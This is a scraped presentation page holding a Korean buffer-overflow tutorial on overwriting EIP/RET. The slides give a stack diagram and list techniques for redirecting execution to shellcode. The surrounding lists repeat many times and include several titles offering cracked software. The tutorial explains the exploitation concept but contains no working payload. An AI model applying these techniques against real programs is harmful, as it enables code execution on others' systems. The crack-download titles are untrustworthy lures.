Design and implementation_of_shellcodes
Amr Ali
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
Patricia Aas
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Efficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native EnvironmentsEfficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native Environments
Gergely Szabó
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
Taeung Song
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
Hacks in Taiwan (HITCON)
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
Simen Li
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Maksim Shudrak
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
Mr. Vengineer
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Maksim Shudrak
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
Simen Li
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?
Mr. Vengineer
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
JinbumPark
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
Patricia Aas
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Efficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native EnvironmentsEfficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native Environments
Gergely Szabó
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
Taeung Song
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
Hacks in Taiwan (HITCON)
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
Simen Li
 

Similar to System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP (20)

Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Advanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptAdvanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter ppt
Muhammad Sikandar Mustafa
 
Virtual Machine for Regular Expressions
Virtual Machine for Regular ExpressionsVirtual Machine for Regular Expressions
Virtual Machine for Regular Expressions
Alexander Yakushev
 
Native interfaces for R
Native interfaces for RNative interfaces for R
Native interfaces for R
Seth Falcon
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
securityxploded
 
C programming language tutorial
C programming language tutorial C programming language tutorial
C programming language tutorial
javaTpoint s
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
Cysinfo Cyber Security Community
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Marina Kolpakova
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
National Cheng Kung University
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Willem van Ketwich
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
distortdistort
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
RootedCON
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
UTD Computer Security Group
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Kapil Nagrale
 
X86 assembly nasm syntax
X86 assembly nasm syntaxX86 assembly nasm syntax
X86 assembly nasm syntax
Francesco DiFusco
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Profiling Ruby
Profiling RubyProfiling Ruby
Profiling Ruby
Ian Pointer
 
05_Return_to_Libc.pdf
05_Return_to_Libc.pdf05_Return_to_Libc.pdf
05_Return_to_Libc.pdf
Testerteste3
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
Kernel TLV
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Advanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptAdvanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter ppt
Muhammad Sikandar Mustafa
 
Virtual Machine for Regular Expressions
Virtual Machine for Regular ExpressionsVirtual Machine for Regular Expressions
Virtual Machine for Regular Expressions
Alexander Yakushev
 
Native interfaces for R
Native interfaces for RNative interfaces for R
Native interfaces for R
Seth Falcon
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
securityxploded
 
C programming language tutorial
C programming language tutorial C programming language tutorial
C programming language tutorial
javaTpoint s
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
Cysinfo Cyber Security Community
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the CompilerPragmatic Optimization in Modern Programming - Demystifying the Compiler
Pragmatic Optimization in Modern Programming - Demystifying the Compiler
Marina Kolpakova
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
National Cheng Kung University
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Willem van Ketwich
 
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
ROPInjector-Slides - Using-Return-Oriented-Programming-For-Polymorphism-And-A...
distortdistort
 
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]
RootedCON
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
UTD Computer Security Group
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Kapil Nagrale
 
X86 assembly nasm syntax
X86 assembly nasm syntaxX86 assembly nasm syntax
X86 assembly nasm syntax
Francesco DiFusco
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Profiling Ruby
Profiling RubyProfiling Ruby
Profiling Ruby
Ian Pointer
 
05_Return_to_Libc.pdf
05_Return_to_Libc.pdf05_Return_to_Libc.pdf
05_Return_to_Libc.pdf
Testerteste3
 
Berkeley Packet Filters
Berkeley Packet FiltersBerkeley Packet Filters
Berkeley Packet Filters
Kernel TLV
 

Recently uploaded (20)

FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
Lionel Briand
 
Exploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the FutureExploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the Future
ICS
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Best Practices for Collaborating with 3D Artists in Mobile Game Development
Best Practices for Collaborating with 3D Artists in Mobile Game DevelopmentBest Practices for Collaborating with 3D Artists in Mobile Game Development
Best Practices for Collaborating with 3D Artists in Mobile Game Development
Juego Studios
 
Cryptocurrency Exchange Script like Binance.pptx
Cryptocurrency Exchange Script like Binance.pptxCryptocurrency Exchange Script like Binance.pptx
Cryptocurrency Exchange Script like Binance.pptx
riyageorge2024
 
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
AxisTechnolabs
 
Download YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full ActivatedDownload YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full Activated
saniamalik72555
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Andre Hora
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Lionel Briand
 
Top 10 Data Cleansing Tools for 2025.pdf
Top 10 Data Cleansing Tools for 2025.pdfTop 10 Data Cleansing Tools for 2025.pdf
Top 10 Data Cleansing Tools for 2025.pdf
AffinityCore
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
Andre Hora
 
Societal challenges of AI: biases, multilinguism and sustainability
Societal challenges of AI: biases, multilinguism and sustainabilitySocietal challenges of AI: biases, multilinguism and sustainability
Societal challenges of AI: biases, multilinguism and sustainability
Jordi Cabot
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
Innovative Approaches to Software Dev no good at all
Innovative Approaches to Software Dev no good at allInnovative Approaches to Software Dev no good at all
Innovative Approaches to Software Dev no good at all
ayeshakanwal75
 
Creating Automated Tests with AI - Cory House - Applitools.pdf
Creating Automated Tests with AI - Cory House - Applitools.pdfCreating Automated Tests with AI - Cory House - Applitools.pdf
Creating Automated Tests with AI - Cory House - Applitools.pdf
Applitools
 
FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
FlakyFix: Using Large Language Models for Predicting Flaky Test Fix Categorie...
Lionel Briand
 
Exploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the FutureExploring Wayland: A Modern Display Server for the Future
Exploring Wayland: A Modern Display Server for the Future
ICS
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Best Practices for Collaborating with 3D Artists in Mobile Game Development
Best Practices for Collaborating with 3D Artists in Mobile Game DevelopmentBest Practices for Collaborating with 3D Artists in Mobile Game Development
Best Practices for Collaborating with 3D Artists in Mobile Game Development
Juego Studios
 
Cryptocurrency Exchange Script like Binance.pptx
Cryptocurrency Exchange Script like Binance.pptxCryptocurrency Exchange Script like Binance.pptx
Cryptocurrency Exchange Script like Binance.pptx
riyageorge2024
 
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
Interactive odoo dashboards for sales, CRM , Inventory, Invoice, Purchase, Pr...
AxisTechnolabs
 
Download YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full ActivatedDownload YouTube By Click 2025 Free Full Activated
Download YouTube By Click 2025 Free Full Activated
saniamalik72555
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)
Andre Hora
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Requirements in Engineering AI- Enabled Systems: Open Problems and Safe AI Sy...
Lionel Briand
 
Top 10 Data Cleansing Tools for 2025.pdf
Top 10 Data Cleansing Tools for 2025.pdfTop 10 Data Cleansing Tools for 2025.pdf
Top 10 Data Cleansing Tools for 2025.pdf
AffinityCore
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...
Andre Hora
 
Societal challenges of AI: biases, multilinguism and sustainability
Societal challenges of AI: biases, multilinguism and sustainabilitySocietal challenges of AI: biases, multilinguism and sustainability
Societal challenges of AI: biases, multilinguism and sustainability
Jordi Cabot
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
Innovative Approaches to Software Dev no good at all
Innovative Approaches to Software Dev no good at allInnovative Approaches to Software Dev no good at all
Innovative Approaches to Software Dev no good at all
ayeshakanwal75
 
Creating Automated Tests with AI - Cory House - Applitools.pdf
Creating Automated Tests with AI - Cory House - Applitools.pdfCreating Automated Tests with AI - Cory House - Applitools.pdf
Creating Automated Tests with AI - Cory House - Applitools.pdf
Applitools
 

System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP

  • 1. System Hacking & Reverse Engineering documented by h2spice [email protected] [ Buffer Overflow - Overwrite EIP ]
  • 2. Who am I Sanghwan,Ahn (h2spice) Works for LINE.Corp Carrying out research on the vulnerability (exploitation,hunt,analysis)
  • 3. 시스템 해킹 / 리버싱 Buffer Overflow 취약점 원리 Stack Overflow Heap Overflow Format String Bug Heap Overflow Use After Free Overwriting RET Overwriting SEH 익스플로잇(Win32/*NIX/ARM) Egg Hunting RTL ROP Heap Spraying 커리큘럼 소개 취약점 / 악성코드 분석 악성코드 분석 Software on X86 버그 헌팅 X86 ARM Mobile 취약점 분석 소스코드 분석 퍼징 CVE-XXXX-XXXX Exploit-DB Inj3ct0r - 1337day 리버스 엔지니어링 iOS Android Overwriting .dtors Overwriting GOT
  • 4. 목차 커리큘럼 소개 Track3 - Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROP Heap Spray Track3-2 *NIX Overwrite RET RTL Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET RTL ROP
  • 6. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 7. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 8. What is the Exploitation ? 익스플로잇 (Exploitation) 이란, 컴퓨터 의 소프트웨어 나 하드웨어 및 컴퓨터 고나련 전자 제품의 버그, 보안 취약점등 설계상의 결함을 이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일련의 명령, 스크립트, 프로그램 또는 특정한 데이터 조각을 말하며, 이러한 것들을 사용한 공격 행위를 의미 공격자가 타깃의 흐름 제어가 (Control Flow) 가능 할 때 부터 진행 보통 특정 버그를 이용하여 취약성을 유발하는 코드와 특정 보안 메커 니즘을 우회하는 코드, 악의적인 동작을 수행하는 코드로 구성 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 9. Overwrite RET (Retrun Address) 스택 버퍼 오버플로우 (Stack Buffer Overflow) 취약성을 이용하여 스 택 영역에 할당된 버퍼의 크기를 초과하는 데이터(공격코드 포함)를 기 록하여 저장된 복구 주소(Return Address)를 공격코드의 주소로 변경 함으로써 임의의 코드를 실행 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 10. How do you fly to shellcode ? 셸 코드(Shell Code)로 이동하는 방법 jmp(or call) [register] : 셸 코드를 가리키는 주소를 레지스터에 넣고, 그 주소를 Return Address에 넣어 셸 코드를 로드할 수 있다. pop return : 셸 코드를 가리키는 주소를 스택에 넣어 놓고 pop/ret 또는 pop/pop/ret (해당 명령이 스택의 어느 위치에 존재하느냐 에 따라 pop의 개수가 달라진다)와 같은 명령을 EIP로 주입함으로써 쉘 코드를 로드 할 수 있다. push return : ‘jmp(or call) [register]’ 와 유사하다. 만약 공격자가 어디에서도 ‘jmp(or call) [register]’ 기계어를 찾을 수 없다면 스택 에 주소를 푸쉬(push)하고 ret 처리하여 셸 코드를 로드할 수 있다. jmp [register + offset] : 셸 코드를 포함하는 버퍼를 가르키는 레지스터가 있지만, 그것이 셸 코드의 시작 위치를 가리키지 않는다면, 공격자는 레 지스터로 가기 위해 필요한 바이트의 덧셈 연산을 하고 jmp [register + offset] 기계어를 통해 셸 코드를 로드할 수 있다. SEH (Error Handler) : 모든 소프트웨어는 OS에 의해 제공되는 예외 처리기를 기본적으로 가지고 있다. 그래서 만약 소프트웨어 자신이 예외 처리를 사용하지 않는다 하더라도, 공격자는 SEH 핸들러를 자신이 원하는 주소로 덮어 씌워, 셸 코드를 로드할 수 있다. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 11. Overwrite RET arg2 arg1 &ret (saved eip) saved ebp char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 12. Overwrite RET arg2 arg1 &ret (saved eip) saved ebp n w o char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction l l e H Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
  • 13. Overwrite RET arg2 arg1 A A A A A A A A &ret (saved eip) saved ebp A A A A A A A A A A A A char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
